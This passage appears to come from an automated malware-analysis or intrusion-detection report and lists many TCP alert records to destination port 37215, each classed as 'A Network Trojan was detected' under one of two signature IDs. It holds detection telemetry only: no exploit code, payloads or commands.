          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673795
          SID:2829579
          Source Port:51306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553162
          SID:2829579
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463373
          SID:2835222
          Source Port:42478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737835
          SID:2835222
          Source Port:34300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855157
          SID:2835222
          Source Port:49070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172947
          SID:2829579
          Source Port:50384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018351
          SID:2835222
          Source Port:52310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667813
          SID:2829579
          Source Port:33590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302426
          SID:2829579
          Source Port:41814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548518
          SID:2835222
          Source Port:60548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059709
          SID:2835222
          Source Port:54724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551345
          SID:2829579
          Source Port:45682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517118
          SID:2829579
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551932
          SID:2829579
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600816
          SID:2829579
          Source Port:45912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394395
          SID:2829579
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037025
          SID:2829579
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671897
          SID:2829579
          Source Port:49530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730388
          SID:2835222
          Source Port:58208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667121
          SID:2835222
          Source Port:42624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509951
          SID:2829579
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708530
          SID:2835222
          Source Port:35252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746846
          SID:2835222
          Source Port:42726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463046
          SID:2829579
          Source Port:35956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792817
          SID:2829579
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135502
          SID:2829579
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464009
          SID:2835222
          Source Port:40292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355058
          SID:2835222
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041249
          SID:2835222
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409874
          SID:2829579
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161143
          SID:2835222
          Source Port:39468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884651
          SID:2835222
          Source Port:32990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109224
          SID:2829579
          Source Port:49392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461289
          SID:2829579
          Source Port:50114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111156
          SID:2829579
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849677
          SID:2835222
          Source Port:55086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113939
          SID:2829579
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129786
          SID:2829579
          Source Port:57796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708953
          SID:2829579
          Source Port:48954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896914
          SID:2835222
          Source Port:52994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730303
          SID:2835222
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732729
          SID:2835222
          Source Port:40150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353478
          SID:2829579
          Source Port:34924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706508
          SID:2835222
          Source Port:44950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133139
          SID:2835222
          Source Port:55256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672275
          SID:2829579
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792155
          SID:2835222
          Source Port:46378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545625
          SID:2835222
          Source Port:47482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396142
          SID:2829579
          Source Port:39208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267795
          SID:2835222
          Source Port:35466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271320
          SID:2835222
          Source Port:39238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670362
          SID:2829579
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128734
          SID:2829579
          Source Port:49412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862966
          SID:2829579
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745344
          SID:2829579
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601508
          SID:2835222
          Source Port:54206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039269
          SID:2835222
          Source Port:36492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786856
          SID:2829579
          Source Port:44524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174789
          SID:2829579
          Source Port:34048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355955
          SID:2829579
          Source Port:59978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153899
          SID:2835222
          Source Port:40398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353238
          SID:2835222
          Source Port:37224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854741
          SID:2835222
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147716
          SID:2835222
          Source Port:33074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177687
          SID:2829579
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444680
          SID:2829579
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456430
          SID:2829579
          Source Port:51210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805142
          SID:2829579
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855383
          SID:2835222
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352513
          SID:2835222
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467460
          SID:2835222
          Source Port:43754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179936
          SID:2835222
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448983
          SID:2835222
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542569
          SID:2829579
          Source Port:50478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811003
          SID:2835222
          Source Port:46186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272383
          SID:2835222
          Source Port:34686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351884
          SID:2835222
          Source Port:44496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708476
          SID:2829579
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108992
          SID:2835222
          Source Port:55318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786756
          SID:2835222
          Source Port:54984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897659
          SID:2829579
          Source Port:42834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783912
          SID:2835222
          Source Port:43888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746206
          SID:2829579
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404504
          SID:2835222
          Source Port:53110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239995
          SID:2835222
          Source Port:44034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793273
          SID:2835222
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704058
          SID:2829579
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546868
          SID:2835222
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818907
          SID:2829579
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264519
          SID:2829579
          Source Port:33962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601055
          SID:2835222
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601961
          SID:2829579
          Source Port:35706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843659
          SID:2835222
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855465
          SID:2829579
          Source Port:35808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745767
          SID:2829579
          Source Port:45552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108048
          SID:2829579
          Source Port:42974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787246
          SID:2835222
          Source Port:48490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160343
          SID:2835222
          Source Port:49846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.125921
          SID:2829579
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743574
          SID:2829579
          Source Port:48836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857075
          SID:2835222
          Source Port:45344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745487
          SID:2829579
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464939
          SID:2835222
          Source Port:36730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788322
          SID:2829579
          Source Port:57018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895896
          SID:2829579
          Source Port:47174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461742
          SID:2835222
          Source Port:57532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514742
          SID:2829579
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829471
          SID:2829579
          Source Port:56000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113321
          SID:2835222
          Source Port:36914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888676
          SID:2835222
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896202
          SID:2835222
          Source Port:41272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743461
          SID:2835222
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264729
          SID:2835222
          Source Port:60154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158996
          SID:2829579
          Source Port:35244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378384
          SID:2835222
          Source Port:46334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780998
          SID:2829579
          Source Port:33912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179590
          SID:2835222
          Source Port:47434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781585
          SID:2835222
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240454
          SID:2829579
          Source Port:36972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299566
          SID:2829579
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169339
          SID:2835222
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035108
          SID:2829579
          Source Port:49738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730667
          SID:2835222
          Source Port:41396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461416
          SID:2835222
          Source Port:33968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732364
          SID:2835222
          Source Port:37790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463415
          SID:2835222
          Source Port:59878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805006
          SID:2835222
          Source Port:53190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444151
          SID:2835222
          Source Port:45640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816471
          SID:2835222
          Source Port:42300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157801
          SID:2829579
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518400
          SID:2829579
          Source Port:53066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897192
          SID:2835222
          Source Port:39864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115925
          SID:2829579
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789770
          SID:2829579
          Source Port:42916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465001
          SID:2835222
          Source Port:34608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394628
          SID:2835222
          Source Port:48820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810307
          SID:2835222
          Source Port:34602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178020
          SID:2835222
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600919
          SID:2835222
          Source Port:59784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732454
          SID:2835222
          Source Port:37500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600450
          SID:2835222
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005771
          SID:2835222
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356294
          SID:2829579
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553117
          SID:2829579
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160510
          SID:2835222
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441866
          SID:2835222
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042104
          SID:2835222
          Source Port:50002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732695
          SID:2835222
          Source Port:34268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893454
          SID:2835222
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059608
          SID:2829579
          Source Port:53236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163272
          SID:2829579
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109368
          SID:2829579
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.110805
          SID:2829579
          Source Port:35880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602940
          SID:2829579
          Source Port:54944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860988
          SID:2835222
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410949
          SID:2829579
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741698
          SID:2835222
          Source Port:37156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262276
          SID:2829579
          Source Port:49602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741927
          SID:2835222
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160433
          SID:2829579
          Source Port:53156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709683
          SID:2835222
          Source Port:54840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673043
          SID:2835222
          Source Port:35190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.077211
          SID:2829579
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145327
          SID:2835222
          Source Port:49220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729184
          SID:2835222
          Source Port:35668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858087
          SID:2835222
          Source Port:51396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860214
          SID:2835222
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352496
          SID:2829579
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153172
          SID:2829579
          Source Port:55736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272159
          SID:2829579
          Source Port:52180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470481
          SID:2829579
          Source Port:59822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262865
          SID:2835222
          Source Port:49532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058193
          SID:2829579
          Source Port:40824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176436
          SID:2835222
          Source Port:40830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179743
          SID:2835222
          Source Port:45994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242424
          SID:2829579
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378178
          SID:2829579
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734966
          SID:2835222
          Source Port:46832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403893
          SID:2835222
          Source Port:51536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729910
          SID:2829579
          Source Port:59170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378243
          SID:2829579
          Source Port:58286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179641
          SID:2829579
          Source Port:57664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857526
          SID:2829579
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179477
          SID:2835222
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786644
          SID:2829579
          Source Port:41724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548753
          SID:2829579
          Source Port:45652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511595
          SID:2835222
          Source Port:60018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467688
          SID:2835222
          Source Port:34406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178757
          SID:2835222
          Source Port:34856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466982
          SID:2835222
          Source Port:44116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746585
          SID:2829579
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353686
          SID:2829579
          Source Port:56682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793323
          SID:2829579
          Source Port:46222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155536
          SID:2835222
          Source Port:38136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019251
          SID:2835222
          Source Port:35898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743316
          SID:2835222
          Source Port:54060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128180
          SID:2829579
          Source Port:54760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
